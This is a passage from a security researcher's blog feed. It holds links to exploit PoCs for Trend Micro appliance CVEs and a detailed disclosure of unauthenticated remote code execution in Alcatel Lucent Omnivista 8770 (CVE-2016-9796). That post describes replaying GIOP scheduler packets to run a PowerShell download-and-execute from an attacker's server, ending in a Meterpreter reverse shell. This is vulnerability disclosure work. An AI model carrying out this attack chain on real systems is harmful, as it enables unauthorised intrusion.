The exploit Proof-of-Concept (poc) has been published <a href="https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33">here</a> and below a video showing the attack in action:<br />
<div class="separator" style="clear: both; text-align: center;">
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i.ytimg.com/vi/rwmfbvvGHDw/0.jpg" frameborder="0" height="266" src="https://www.youtube.com/embed/rwmfbvvGHDw?feature=player_embedded" width="320"></iframe></div>
<br />
<div class="" style="clear: both; text-align: center;">
<br /></div>
The exploits for all the other TDA vulnerabilities that were discovered as part of this research can be found below:<br />
<br />
<a href="https://gist.github.com/malerisch/0b8ecfcb03a2c2f26e5f649cf1df8d33">CVE-2016-8584 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) Session Generation Authentication Bypass Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/b8764501d299f2ec9eb145258d404e5f">CVE-2016-7547 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Information Disclosure Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/5de8b408443ee9253b3954a62a8d97b4">CVE-2016-7552 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 logoff.cgi Directory Traversal Authentication Bypass Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/91239147d4fceffa63006974889ef1af">CVE-2016-8585 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 admin_sys_time.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/97c160aa4e8219c7c9ad25107444a280">CVE-2016-8586 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 detected_potential_files.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/aac1ad3e6f3bfd70b35ba6538ecbff23">CVE-2016-8587 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 dlp_policy_upload.cgi Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/93be2141dfc5709159468762937f2853">CVE-2016-8588 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 hotfix_upload.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/3bbb6d0b235fa5af2ba6f05826fe3846">CVE-2016-8589 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dae.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/7b84a4bd6eee0a3a591677f421653a2e">CVE-2016-8590 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 log_query_dlp.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/5dd838a723b342bb04121f29a8333e00">CVE-2016-8591 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/0c78e49124561524fd59d6635007eefd">CVE-2016-8592 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) log_query_system.cgi Command Injection Remote Code Execution Vulnerability</a><br />
<br />
<a href="https://gist.github.com/malerisch/c59ab650c8e226ef22cdfbfeeee6d4ec">CVE-2016-8593 - Trend Micro Threat Discovery Appliance <= 2.6.1062r1 (latest) upload.cgi Remote Code Execution Vulnerability</a><br />
<br />
A Metasploit module has been developed and added to the master branch:<br />
<br />
<a href="https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb">https://github.com/rapid7/metasploit-framework/blob/master/modules/exploits/multi/http/trendmicro_threat_discovery_admin_sys_time_cmdi.rb</a>Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com2tag:blogger.com,1999:blog-5593108060941425908.post-46271550787817294952016-12-01T13:08:00.000+01:002016-12-30T17:18:50.814+01:00Alcatel Lucent Omnivista or: How I learned GIOP and gained Unauthenticated Remote Code Execution (CVE-2016-9796)It is time for another advisory or better a blog post about <a href="http://enterprise.alcatel-lucent.com/?product=Omnivista8770NetworkManagementsystem&page=overview">Alcatel Lucent Omnivista</a> and its vulnerabilities. Omnivista is a central management network tool and it is typically used in medium/large organisation with a complex VoIP/SIP infrastructure.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNwcgRWZsbMobKG0FR4JForFOKWAtnt4-2I4fTOBAQuE7qTImBJeg9kw5OIcZtyTU5z-ApH9-lHx2r9qXwxRTJ7pfWmgqai4BUm2gZNG0aK0Ojbswy8D2btO-qqjYOckLgV-gabH9wFL0/s1600/twitter-pic2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="379" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjNwcgRWZsbMobKG0FR4JForFOKWAtnt4-2I4fTOBAQuE7qTImBJeg9kw5OIcZtyTU5z-ApH9-lHx2r9qXwxRTJ7pfWmgqai4BUm2gZNG0aK0Ojbswy8D2btO-qqjYOckLgV-gabH9wFL0/s640/twitter-pic2.png" width="640" /></a></div>
<br />
<br />
Interestingly enough, this software belongs to the niche of "undownloadable" software and it requires a license to work as well. My "luck" came during an engagement where it was already installed and this post documents one of the many 0days discovered during such audit.<br />
<br />
The reasons why I wanted to dedicate a single blog post on this vulnerability are several.<br />
<br />
First, remote code execution (RCE) is always a sweet bug to show. Second, I strongly believe that documenting vulnerabilities in applications using old protocols and standards, respectively GIOP and CORBA, can be beneficial for the infosec community, since no many examples of vulnerabilities in such applications are available or published on the Internet.<br />
<br />
Actually, I would like to be proven wrong when stating that this is probably the only blog post documenting an exploit against a CORBA/GIOP based application. I will leave my readers to prove me wrong...<br />
<br />
However, this does not mean that such technologies are no longer in use. Consider that Java includes CORBA support in their package (see <a href="https://docs.oracle.com/javase/7/docs/api/org/omg/CORBA/ORB.html">class ORB</a>). Also, a lot of critical and often "legacy" applications and systems do make use of such technologies, so I assume it is important to understand them and look for an exploitation angle. Hopefully, this will inspire other people to share their similar attacks or exploits.<br />
<br />
In a Twitter survey that I ran some time ago, I was also curios to see how many people are familiar with such technologies, but even though the survey sample is limited, the statistics are clear:<br />
<blockquote class="twitter-tweet" data-lang="en">
<div dir="ltr" lang="en">
For stats for my next blog post - have you ever tested or worked with Corba/Giop based software?</div>
— Roberto Suggi (@malerisch) <a href="https://twitter.com/malerisch/status/754616407342678016">July 17, 2016</a></blockquote>
So enough with introduction, let's now dive into the vulnerability - for those of you who want to skip the theory, then just jump to video and PoC exploit sections, at the bottom of this blog post. As usual, comments and feedback are more than welcome. Enjoy and if you like this blog post, then re-tweet it!<br />
<br />
<b>So what is CORBA and GIOP?</b><br />
<br />
OMG (Object Management Group) designed the CORBA (Common Object Request Broker Architecture) standard to allow interoperability between different hardware and software. The Omnivista product takes advantage of such design to ensure its "universal" compatibility as central management network solution. The CORBA architecture is similar to the remote procedure call architecture from the eighties, with the support of ORBs (Object Request Brokers).<br />
<br />
For those of you unfamiliar with this technology and terminology, then just imagine a client/server model with exposed objects that can be invoked from different machines.<br />
<br />
To better explain, here is a simple high-level diagram which shows a CORBA architecture:<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5yNi8Dd14IY4Zej13EMQUbmY7aFRBIsvA5ATccS1LtmicH2usy7ZSbf0K7pH13kzd0_vJgL8VEq8fOa7Jb5u9Uxm3j7CN-HX_XsCvLehyphenhyphenCOvwSyeoCfGukOlX9N5wDiHh5RTjgFVw-0/s1600/s1.png" imageanchor="1"><img border="0" height="163" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEha5yNi8Dd14IY4Zej13EMQUbmY7aFRBIsvA5ATccS1LtmicH2usy7ZSbf0K7pH13kzd0_vJgL8VEq8fOa7Jb5u9Uxm3j7CN-HX_XsCvLehyphenhyphenCOvwSyeoCfGukOlX9N5wDiHh5RTjgFVw-0/s640/s1.png" width="640" /></a><br />
<br />
ORB is an abstraction which defines the mechanisms responsible for creating, sending and locating the object references used in the remote calls. Behind an ORB, there is more and in fact an object is defined by interfaces, using the IDL language (Interface Definition Language). IDL allows CORBA to be programming language independent - imagine a Java client that can invoke a remote object written in C++. These are the "flexibility" and neutrality features of CORBA. There are also other components, such as stab, and runtime code which is not covered in this blog post (see references at the bottom for more detailed information).<br />
<br />
Many implementations exists that support ORB architectures, such as <a href="http://omniorb.sourceforge.net/index.html">OmniORB</a>, used by the Omnivista solution.<br />
<br />
The communication aspect which regards the client and server interaction for object-oriented remote procedure calls is covered by GIOP and IIOP.<br />
<br />
GIOP (General Inter-ORB Protocol) is the general protocol that defines the network communication between a client and a server. GIOP is transport layer independent and its level of abstraction is higher that IIOP. IIOP (Internet Inter-ORB Protocol) is a specialisation of GIOP, which defines CORBA communication over TCP/IP transport layer.<br />
<br />
To summarize again with a high-level diagram, this is what it looks like when a client and server communicates (image courtesy of <a href="https://en.wikipedia.org/w/index.php?curid=18751499">User:Alksentrs</a>):<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://upload.wikimedia.org/wikipedia/en/thumb/f/f0/Orb.svg/401px-Orb.svg.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://upload.wikimedia.org/wikipedia/en/thumb/f/f0/Orb.svg/401px-Orb.svg.png" width="319" /></a></div>
<br />
Wireshark has a built-in decoder for GIOP packets and their structure. An example of GIOP request packet exchanged between the Omnivista client ORB and server's ORB is shown below. Highlighted elements are of interest for understanding how CORBA/GIOP works in this case.<br />
<br />
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFOImoHlVv3tzez-dCAfgObKq92sJUMn6t-JmNzh-el65lB9Bp7G-0jKd0uMu_0bwRNGW9jdCzY3r19TMbFOhNNZzkzqmp9XNiCb18NBSifJHjcRORK-C9RcypoivG6QsatxwjDKiF5DU/s1600/s2.png" imageanchor="1"><img border="0" height="528" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhFOImoHlVv3tzez-dCAfgObKq92sJUMn6t-JmNzh-el65lB9Bp7G-0jKd0uMu_0bwRNGW9jdCzY3r19TMbFOhNNZzkzqmp9XNiCb18NBSifJHjcRORK-C9RcypoivG6QsatxwjDKiF5DU/s640/s2.png" width="640" /></a><br />
<br />
The 30024 TCP port is the port at which the ORB is listening on the server-side.<br />
<br />
The GIOP packet per se is defined by different elements. We see an header which includes the message type (request) and size. Then the request part itself that contains various elements, such as object key length, object key and the request operation. Then the stub data is empty in this case, but this represents the request "body" or better the parameters which might be included within the request.<br />
<br />
The object key is used by the ORB on the server side along with the request operation. The request operation is the IDL identifier naming, within the context of the interface, basically the operation being invoked. The request operation and object key are passed to the ORB on the server-side, by providing the call and the arguments to the listening service.<br />
<br />
For a full technical specification of the GIOP protocol packet, which is beyond the scope of this blog post, the following <a href="http://www.omg.org/cgi-bin/doc?formal/2002-05-15.pdf">paper</a> is recommended.<br />
<br />
The Omnivista server makes use of multiple OmniORB ORBs listening on different ports. A full network scan of the Omnivista shows multiple "omniORB and CORBA naming services". Below, the result of an nmap scan filtered on GIOP ports:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo0rHvad1fClI20T2oZ8Ky8gS_BrDQcwsLd49bE6yqhckKEC76K1rq-UKcd0KqAxr4wC0OhnDIRcis4MQlN768coAGihB3T0ztnDGpWuaBJuBVWkZOvicvD4HcEH9x_qva4EQLIBnZx34/s1600/giop-services.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="537" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgo0rHvad1fClI20T2oZ8Ky8gS_BrDQcwsLd49bE6yqhckKEC76K1rq-UKcd0KqAxr4wC0OhnDIRcis4MQlN768coAGihB3T0ztnDGpWuaBJuBVWkZOvicvD4HcEH9x_qva4EQLIBnZx34/s640/giop-services.png" width="640" /></a></div>
<br />
<br />
<b>Where is the bug and how it can be exploited?</b><br />
<br />
The bug derives from the fact that determined ORBs are exposed and they can be invoked without authentication. Also, the ORBs allow access to interfaces on the server which can be abused or misused to achieve code execution. The attacker only needs to reproduce a sequence of requests/responses in order to abuse such ORBs and execute arbitrary code on the server.<br />
<br />
Let's see step by step where the vulnerability lies and how it was discovered. First, by using the Omnivista client itself I tried to understand how it works, what it is possible to do and what features/things can be invoked.<br />
<br />
This is a screen shot of the GUI, after successful authentication:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmgiYhsIpcCBdW_CTOGWIkYRvh5ZsucaULDbMUTuA8xviEINVmg12BwF3K30ufaTKoduwAi8HMuu9UQx2irpvQ8msHgG8kjRjqgBgW3NF_fK2eCTDfgxON98h3sJQQ9OzXkIki17IT8qI/s1600/s3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="452" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgmgiYhsIpcCBdW_CTOGWIkYRvh5ZsucaULDbMUTuA8xviEINVmg12BwF3K30ufaTKoduwAi8HMuu9UQx2irpvQ8msHgG8kjRjqgBgW3NF_fK2eCTDfgxON98h3sJQQ9OzXkIki17IT8qI/s640/s3.png" width="640" /></a></div>
<br />
Under the setup tab, the scheduler component attracted my attention. I then noticed that a user can create a job, add a task and then the possibility to add a reference to an executable on the server's system.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6yvCW-_1Ca9gIgZNxZMqgKroLIitUCME2VqKw5MopFJial8ieuGtqzC2a9bjiKq5N23M1jp8KoOBpd1kttOqCb3S4MFZe3RWeEgjVbx0wZ1YFma3HhvEeGCvDqcQXNcWvGqG6ZzVLEM8/s1600/s4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="436" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh6yvCW-_1Ca9gIgZNxZMqgKroLIitUCME2VqKw5MopFJial8ieuGtqzC2a9bjiKq5N23M1jp8KoOBpd1kttOqCb3S4MFZe3RWeEgjVbx0wZ1YFma3HhvEeGCvDqcQXNcWvGqG6ZzVLEM8/s640/s4.png" width="640" /></a></div>
<br />
Once the task is added, a job can be executed, leading to the launching of an executable. For instance, I created a job task which would execute "C:\windows\system32\cmd.exe" with an argument as "/c notepad.exe".<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sI20I4v2mhyr398KFyHohXD_IKkeBJe0nK8RfaAprGgmr7eK8J07vVrtxWcaIr0L9Zl240ioRqeqAbbRyLgA4Ojbl1avA0opYrfsnfVSIBg1dS0zUUsmZlkQjVTTbqq5on_a0R_0sEQ/s1600/scheduler_with_cmd.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="284" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh-sI20I4v2mhyr398KFyHohXD_IKkeBJe0nK8RfaAprGgmr7eK8J07vVrtxWcaIr0L9Zl240ioRqeqAbbRyLgA4Ojbl1avA0opYrfsnfVSIBg1dS0zUUsmZlkQjVTTbqq5on_a0R_0sEQ/s640/scheduler_with_cmd.png" width="640" /></a></div>
<br />
<br />
Then I executed the job to see how the feature works.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq5P6SQ7qMzAJsOJIGRoFqqJG0eNOzPthai1kfdaNTTPzzJVH4BpZkgf0-VnHCBumGEKemLZSWw-f-fR2Op1NKTPvmz81fNnbJxNVtX83dxppIPWZAZyOKvZpFwlsNpE2Tp1iN6rjAaqA/s1600/execute-job.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="502" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhq5P6SQ7qMzAJsOJIGRoFqqJG0eNOzPthai1kfdaNTTPzzJVH4BpZkgf0-VnHCBumGEKemLZSWw-f-fR2Op1NKTPvmz81fNnbJxNVtX83dxppIPWZAZyOKvZpFwlsNpE2Tp1iN6rjAaqA/s640/execute-job.png" width="640" /></a></div>
<br />
On the server, I observed the task which is indeed executed and notepad.exe is launched:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqR8GZDNp4GGSHyZmZO7qQakmGQ_h7Pih0rWvxJgiVqln537ApEGseKIyUxLkWAaUe3u1mJnr7ukmoyp0wX6IEGl7RLdApZ1rON3lcVJf7SdB5YNY81YAzXSgBIbBAIBE47GXoV-4-oo/s1600/process-on-server.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="64" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjTqR8GZDNp4GGSHyZmZO7qQakmGQ_h7Pih0rWvxJgiVqln537ApEGseKIyUxLkWAaUe3u1mJnr7ukmoyp0wX6IEGl7RLdApZ1rON3lcVJf7SdB5YNY81YAzXSgBIbBAIBE47GXoV-4-oo/s640/process-on-server.png" width="640" /></a></div>
<br />
<br />
As authenticated administrators these operations might be "acceptable", but what if an attacker is able to do the same from a remote position and without authentication?<br />
<br />
When facing unusual technologies, the best recommendation is to analyze traffic between client and server while using all the functionality provided by the target software. In this case, the Omnvista client (a Java thick-client) was connecting to determined ports using the GIOP protocol. By examining packets, it is possible to understand what requests and responses occur between the client and server.<br />
<br />
One of the major drawbacks in the way Omnivista has implemented CORBA/GIOP is the fact that replay attacks are possible, due to the lack of a proper session mechanism, although security and authentication has been implemented within the Omnivista product itself.<br />
<br />
My first attempt to prove this point was to replay a request/action that can only be performed post authentication. For instance, among the sniffed GIOP packets, I picked the "addJob" request and see if replayed from a different machine with a different IP address without authenticating, would lead to the same result/response.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTY3BD_KHdZ_4f9M4Pao_YZJXiTo5EtJgjQL1JNiSApkDM917r9Wwnu7wSblpdlTRrzbVGlY77mx8jBrx4DgKlekVifD_74TzqGVw8F6gLQwXK3CPMEiTC1-GGk0U-Rby44ZIoEoPVUH0/s1600/addjob.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="224" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEiTY3BD_KHdZ_4f9M4Pao_YZJXiTo5EtJgjQL1JNiSApkDM917r9Wwnu7wSblpdlTRrzbVGlY77mx8jBrx4DgKlekVifD_74TzqGVw8F6gLQwXK3CPMEiTC1-GGk0U-Rby44ZIoEoPVUH0/s640/addjob.png" width="640" /></a></div>
<br />
By first analysing the packet, I noticed that no session token/nonce or challenge seems to be in the payload so I thought I was going in the right direction.<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjntLUDql9JZ2BINinf0cruEqkyzv9W8ZD0Csi1BZpvw7_1OZOEyDkZLfpL4-jWZuFJfVWdWTFpEu6cGXu0THZ7_VMPED6FAIKY6T48id9bsycEh1SDyQrlevdh-nAH2pBV-NlWmjoXHpk/s1600/giop-body.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="314" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjntLUDql9JZ2BINinf0cruEqkyzv9W8ZD0Csi1BZpvw7_1OZOEyDkZLfpL4-jWZuFJfVWdWTFpEu6cGXu0THZ7_VMPED6FAIKY6T48id9bsycEh1SDyQrlevdh-nAH2pBV-NlWmjoXHpk/s640/giop-body.png" width="640" /></a></div>
<br />
I removed the BBBBB task using a valid session just to ensure that my action would re-create the task with the same name. I extracted the packet and sent the single packet and got the same response from the server! Went back to check the client and the task was back there!<br />
<br />
That sounded extremely promising, now I had to understand the entire attack flow and prepare the exploit chain.<br />
<br />
<b>Exploit chain</b><br />
<br />
So after analysis of the entire sequence, the conclusion is that it is possible to achieve unauthenticated remote code execution, by performing a mounted attack using respectively three different operations, such as AddJobSet, AddJob and ExecuteNow. These operations must be executed in sequence by sending valid GIOP packets to the OmniVista server, on TCP port 30024.<br />
<br />
Let's now dive into each step:<br />
<br />
<i>1st step - AddJobSet</i><br />
<br />
The AddJobSet packet is sent – an example below – this packet uses the SchedulerInterface to add a Job set on the server.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9mUi5jGhuwWrrb0YDVAtt4LLDBAU9ZSCoRT8YRezjgUjcEN3fFMkTaBkZNh9hZtEbu0sxN1Qs4vS-Me1G213BAauT35KfQAKzmg3vY6NFud2OwZ8nW30rLLvsZe5M7wqtokgiHoIS0jk/s1600/addjobset.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="320" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEj9mUi5jGhuwWrrb0YDVAtt4LLDBAU9ZSCoRT8YRezjgUjcEN3fFMkTaBkZNh9hZtEbu0sxN1Qs4vS-Me1G213BAauT35KfQAKzmg3vY6NFud2OwZ8nW30rLLvsZe5M7wqtokgiHoIS0jk/s640/addjobset.png" width="640" /></a></div>
<span lang="EN-GB" style="font-family: "times new roman" , serif; font-size: 12.0pt;"><br /></span>
<span lang="EN-GB" style="font-family: "times new roman" , serif; font-size: 12.0pt;">The SchedulerInterface is the object key of this action and this can be seen in Wireshark too:</span><br />
<span lang="EN-GB" style="font-family: "times new roman" , serif; font-size: 12.0pt;"><br /></span>
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAH0tpjsPlgsbA3H39NTs33nEikd_uoedxBkXaHR4g1ajMQh7YU9-oToisV4oBNoh0A7apDu5GrdIR-dLcL8BGjZfb3_gmhUzGICD4ZY_yI_FGFH3Thssdw5e0-RCxwgl37edpzSxIQY/s1600/objectkey-firstpacket.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjHAH0tpjsPlgsbA3H39NTs33nEikd_uoedxBkXaHR4g1ajMQh7YU9-oToisV4oBNoh0A7apDu5GrdIR-dLcL8BGjZfb3_gmhUzGICD4ZY_yI_FGFH3Thssdw5e0-RCxwgl37edpzSxIQY/s1600/objectkey-firstpacket.png" /></a></div>
<span lang="EN-GB" style="font-family: "times new roman" , serif; font-size: 12.0pt;"><br /></span>
The response contains now an object key that has to be used in the following requests. In our case, the response contains the object key: 00 00 00 00 36 32 81 55 F8 F4 08 00 61 00 00 00. We will see this object used within the following steps of the attack flow.<br />
<br />
<i>2nd Step: AddJob packet</i><br />
<br />
In this packet we had the specific job inside the jobset test1, using the object key obtained in the reply from the AddJobSet request. In this case, the object key is highlighted in black in the screen shot below. In this case a job named test2 is set, which would call C:\Windows\System32\cmd.exe executable with an argument, invoking a Powershell web script to download and execute a malicious script hosted on the attacker's server.<br />
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkQkqiF-80PD-j1gY2SiX9Q2xjlH70F6svdJC31dd8dA0CyxLyT-8zYRmSm1QtNCXA-gKNJJbmvhIqLouwtGr2J90fdejBBmxzOt-Gw59XVY8jhoary0bEe-KekMVz-9pi4Ct6gW_5LY/s1600/addjob2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="358" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhQkQkqiF-80PD-j1gY2SiX9Q2xjlH70F6svdJC31dd8dA0CyxLyT-8zYRmSm1QtNCXA-gKNJJbmvhIqLouwtGr2J90fdejBBmxzOt-Gw59XVY8jhoary0bEe-KekMVz-9pi4Ct6gW_5LY/s640/addjob2.png" width="640" /></a></div>
<div>
<i><br /></i></div>
<div>
<div>
<i>3rd step: ExecuteNow:</i></div>
<div>
<br /></div>
<div>
Once the test2 job is added, then the ExecuteNow method can be launched to execute immediately the job. Again, the same object key (highlighted in black) will be used in this request as well:</div>
</div>
<div>
<br /></div>
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfYKwuBxuXqOsozFLnCtfmXzYF2tEf6NQ0PZTLO1P8M1Wor4u8Ei5WKt6QkI1BhGUDR1am8z-pfrTdQzL5Itmva98H6pBTEn_HCMdTPt5OdvX91MUSwqUYBl6qHGUWKdl4S89tPt8Schc/s1600/executenow.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="100" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEgfYKwuBxuXqOsozFLnCtfmXzYF2tEf6NQ0PZTLO1P8M1Wor4u8Ei5WKt6QkI1BhGUDR1am8z-pfrTdQzL5Itmva98H6pBTEn_HCMdTPt5OdvX91MUSwqUYBl6qHGUWKdl4S89tPt8Schc/s640/executenow.png" width="640" /></a></div>
<div>
<br /></div>
Below, the Omni Vista server connects back to the attacker’s machine, concluding our exploit chain in a sweet Meterpreter shell:<br />
<br />
<div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsHvldmwJ9rlhjBDED7PrpZrO1ObZhs7Ljyj4p9-WluMSCqqNlmQUelvt9-157okzxGI-kw_Ce1exbHoz4gEHnHxXSAT92LplENdBipTwXtn6BiPIhPmygpD8V1TP_4ZSkuvdYdKVXaWA/s1600/meterpreter-reverse.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="88" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjsHvldmwJ9rlhjBDED7PrpZrO1ObZhs7Ljyj4p9-WluMSCqqNlmQUelvt9-157okzxGI-kw_Ce1exbHoz4gEHnHxXSAT92LplENdBipTwXtn6BiPIhPmygpD8V1TP_4ZSkuvdYdKVXaWA/s640/meterpreter-reverse.png" width="640" /></a></div>
<br />
<b>PoC - Exploit</b><br />
<br />
Github - python script - <a href="https://github.com/malerisch/omnivista-8770-unauth-rce">https://github.com/malerisch/omnivista-8770-unauth-rce</a><br />
<br />
<b>Video</b><br />
<div class="separator" style="clear: both; text-align: center;">
<iframe allowfullscreen="" class="YOUTUBE-iframe-video" data-thumbnail-src="https://i9.ytimg.com/vi/aq37lQKa9sk/default.jpg?sqp=CPz0_8EF&rs=AOn4CLAA3AsfZB8jtiR6MHpGUzPeInrpYQ" frameborder="0" height="266" src="https://www.youtube.com/embed/aq37lQKa9sk?feature=player_embedded" width="320"></iframe></div>
<b><br /></b><b><br /></b>
<b><br /></b>
<br />
<b>Affected versions:</b><br />
<br />
Alcatel Lucent Omnivista 8770 2.0, 2.6 and 3.0.<br />
<br />
<br />
<b>Disclosure Timeline</b><br />
<ul>
<li>16/02/2016 First contact</li>
<li>16/02/2016 Response from HSSE to contact to Alcalel Lucent</li>
<li>26/04/2016 Report sent to PSIRT Alcatel Lucent</li>
<li>26/04/2016 Response from Nokia PSIRT</li>
<li>27/04/2016 New contact provided from Nokia - PSIRT Alcatel Lucent</li>
<li>09/05/2016 PSIRT provides temporary license/and software download</li>
<li>18 May 2016 - Vendor provides download link and temporary license to verify if also version 3.0 is affected</li>
<li>30 June 2016 - Version 2.6 is also vulnerable</li>
<li>1 July 2016 - Version 3.0 also confirmed as vulnerable</li>
<li>1 August 2016 - Patch should be available on November</li>
<li>29 October 2016 - Vendor confirms patches for SQLi and XSS vulnerabilities in the product, but no CVE or patch has been assigned for this issue. The vendor position is to refer t<u>o the technical guidelines of the product security deployment to mitigate this issue</u>, which means applying proper firewall rules to prevent unauthorised clients to connect to the Omnivista server.</li>
<li>2 December 2016 - Contacted Mitre to obtain CVE - CVE assigned is: <a href="https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2016-9796">CVE-2016-9796</a></li>
</ul>
<br />
<b>References and interesting links:</b><br />
<ul>
<li>GIOP - <a href="https://en.wikipedia.org/wiki/General_Inter-ORB_Protocol">https://en.wikipedia.org/wiki/General_Inter-ORB_Protocol</a></li>
<li>CORBA specification - The Common Object Request Broker:</li>
<li>Architecture and Specification 2.6.1 - <a href="http://www.omg.org/spec/CORBA/2.6.1/PDF/">http://www.omg.org/spec/CORBA/2.6.1/PDF/</a></li>
<li>Under the hood: IORs, GIOP and IIOP - IBM - <a href="http://www.ibm.com/developerworks/library/ws-underhood/">http://www.ibm.com/developerworks/library/ws-underhood/</a></li>
</ul>
<br />Roberto Suggi Liveranihttp://www.blogger.com/profile/00603006078110455351noreply@blogger.com6tag:blogger.com,1999:blog-5593108060941425908.post-28482169526935007722016-10-03T07:53:00.000+02:002016-10-03T07:53:14.705+02:00Pwning a thin client in less than one minute, again!<br />
Back in 2015, I have published a blog post titled "<a href="http://blog.malerisch.net/2015/04/pwning-hp-thin-client.html">Pwning a thin client in less two minutes</a>" which attracted a lot of curiosity from the Internet and which was also featured in the <a href="http://hackaday.com/2015/04/29/hacking-a-thin-client-to-gain-root-access/">HACKADAY</a> blog.<br />
<br />
